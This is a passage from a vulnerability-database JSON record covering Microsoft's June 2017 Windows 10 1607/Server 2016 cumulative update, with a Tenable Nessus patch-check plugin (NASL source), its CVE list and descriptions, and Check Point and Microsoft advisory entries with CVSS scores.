CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the Windows Secure Kernel Mode feature due to a failure to properly handle objects in memory. A local attacker can exploit this, via a specially crafted application, to bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in Microsoft Edge due to improper handling of JavaScript XML DOM objects. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in Microsoft Edge in the Fetch API due to improper handling of filtered response types. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose sensitive information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due to improper handling of kernel mode requests. An unauthenticated, remote attacker can exploit this, via a specially crafted kernel mode request, to cause the machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0173", "CVE-2017-0193", "CVE-2017-0215", "CVE-2017-0216", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0295", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8496", "CVE-2017-8497", "CVE-2017-8498", "CVE-2017-8504", "CVE-2017-8515", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8553", "CVE-2017-8554", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022715.NASL", "href": "https://www.tenable.com/plugins/nessus/100760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100760);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0173\",\n \"CVE-2017-0193\",\n \"CVE-2017-0215\",\n \"CVE-2017-0216\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0295\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8496\",\n \"CVE-2017-8497\",\n \"CVE-2017-8498\",\n \"CVE-2017-8504\",\n \"CVE-2017-8515\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8553\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98833,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98873,\n 98878,\n 98879,\n 98880,\n 98882,\n 98884,\n 98885,\n 98886,\n 98887,\n 98892,\n 98895,\n 98896,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98904,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98940,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022715\");\n script_xref(name:\"MSFT\", value:\"MS17-4022715\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022715: Windows 10 Version 1607 and Windows Server 2016 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4022715. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0173,\n CVE-2017-0215, CVE-2017-0216, CVE-2017-0218,\n CVE-2017-0219)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-8496, CVE-2017-8497)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. (CVE-2017-8515)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper handling of objects\n in memory. An authenticated, remote attacker can exploit\n these, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8553, CVE-2017-8554)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\");\n # https://support.microsoft.com/en-us/help/4022715/windows-10-update-kb4022715\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ac6572f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022715 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-06';\nkbs = make_list('4022715');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(\n os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-10-18T18:46:34", "description": "An information disclosure vulnerability exists in Microsoft Edge and Internet Explorer. The vulnerability is due to Microsoft Edge improperly handling objects in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted html file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Browser Information Disclosure (CVE-2017-8529)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2017-06-13T00:00:00", "id": "CPAI-2017-0456", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:33:39", "description": "A use after free vulnerability exists in Microsoft Edge. The vulnerability is due to the way JavaScript engine renders when handling objects in memory. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (MS17-007: CVE-2017-0071; CVE-2017-8548)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0071", "CVE-2017-8548"], "modified": "2017-08-29T00:00:00", "id": "CPAI-2017-0168", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-18T20:21:09", "description": "An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer. In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability.\n\nIn addition, compromised websites and websites that accept or host user-generated content could contain specially crafted content that could exploit the vulnerability. However, in all cases an attacker would have no way to force a user to view the attacker-controlled content. Instead, an attacker would have to convince a user to take action. For example, an attacker could trick a user into clicking a link that takes the user to the attacker's site.\n\nAn attacker who successfully exploited the vulnerability could potentially read data that was not intended to be disclosed. Note that the vulnerability would not allow an attacker to either execute code or to elevate a user\u2019s rights directly, but the vulnerability could be used to obtain information in an attempt to further compromise the affected system.\n\nThe security update addresses the vulnerability by helping to restrict what information is returned to affected Microsoft browsers.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Microsoft Browser Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2017-09-20T07:00:00", "id": "MS:CVE-2017-8529", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-8529", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-06T18:25:23", "description": "An elevation of privilege vulnerability exists when tdx.sys fails to check the length of a buffer prior to copying memory to it.\n\nTo exploit the vulnerability, in a local attack scenario, an attacker could run a specially crafted application to elevate the attacker's privilege level. An attacker who successfully exploited this vulnerability could run processes in an elevated context.\n\nHowever, an attacker must first gain access to the local system with the ability to execute a malicious application in order to exploit this vulnerability.\n\nThe security update addresses the vulnerability by changing how tdx.sys validates buffer length.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T07:00:00", "type": "mscve", "title": "Windows TDX Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, 